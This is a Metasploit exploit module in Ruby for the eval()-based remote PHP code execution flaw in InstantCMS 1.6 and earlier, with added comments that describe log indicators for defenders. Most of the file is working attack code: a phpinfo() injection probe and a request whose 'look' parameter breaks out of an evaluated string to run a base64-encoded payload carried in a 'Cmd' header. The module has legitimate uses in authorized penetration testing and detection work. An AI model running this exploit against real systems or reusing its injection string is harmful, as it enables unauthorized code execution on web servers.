Path: blob/master/modules/exploits/unix/webapp/instantcms_exec.rb
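##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit remote exploit module for the eval()-based PHP code execution
# flaw in InstantCMS 1.6 and earlier (CVE-2013-10051 per 'References' below).
#
# Defender notes, derived from the requests this module builds:
# - Both requests are GETs to the configured TARGETURI with `view=search`.
# - The check request carries a `query` value that starts with `${`.
# - The exploit request carries a `look` value containing
#   `eval(base64_decode(` and a `Cmd` request header holding base64 data.
#   Query strings normally land in web access logs; the `Cmd` header is only
#   visible where request-header logging or a WAF/proxy capture is enabled.
# - The description states that 1.6 and prior are affected. It does not name
#   a fixed release, so confirm the patched version against the vendor
#   advisory before treating an upgrade as the mitigation.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the single TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',
        'Description' => %q{
          This module exploits an arbitrary PHP command execution vulnerability because of a
          dangerous use of eval() in InstantCMS in versions 1.6 and prior.
        },
        'Author' => [
          'AkaStep', # Vulnerability discovery and PoC
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-10051' ],
          [ 'BID', '60816' ],
          [ 'PACKETSTORM', '122176' ]
        ],
        'Privileged' => false,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [
          [ 'InstantCMS 1.6', {} ],
        ],
        'DisclosureDate' => '2013-06-26',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed for
        # this module; treat its impact on a tested host as unknown.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])
      ]
    )
  end

  # Probes the search view and reports whether phpinfo() output came back.
  #
  # @return [Exploit::CheckCode] Vulnerable when the response body contains
  #   "Build Date", Unknown when no response was received, Safe otherwise.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view' => 'search',
        'query' => '${echo phpinfo()}'
      }
    })

    # No response says nothing about the application. Reporting Safe here
    # would be a false negative in an assessment, so report Unknown instead.
    return Exploit::CheckCode::Unknown unless res

    # "Build Date" is matched as a marker of rendered phpinfo() output.
    return Exploit::CheckCode::Vulnerable if res.body.match(/Build Date/)

    # NOTE(review): Safe only means the probe did not render phpinfo(). A
    # filtering proxy or a PHP build with phpinfo() disabled would presumably
    # give the same result on an unpatched install, so verify the installed
    # version separately.
    Exploit::CheckCode::Safe
  end

  # Sends the single request that delivers the encoded payload.
  #
  # The `look` parameter closes the string the application evaluates (per the
  # module description, a dangerous eval() call) and appends PHP that decodes
  # and evaluates the `Cmd` request header. The payload travels base64-encoded
  # in that header, not in the URL. The response is not inspected.
  def exploit
    print_status("Executing payload...")

    send_request_cgi({
      'uri' => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view' => 'search',
        'query' => rand_text_alpha(3 + rand(3)),
        'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"
      },
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })
  end
end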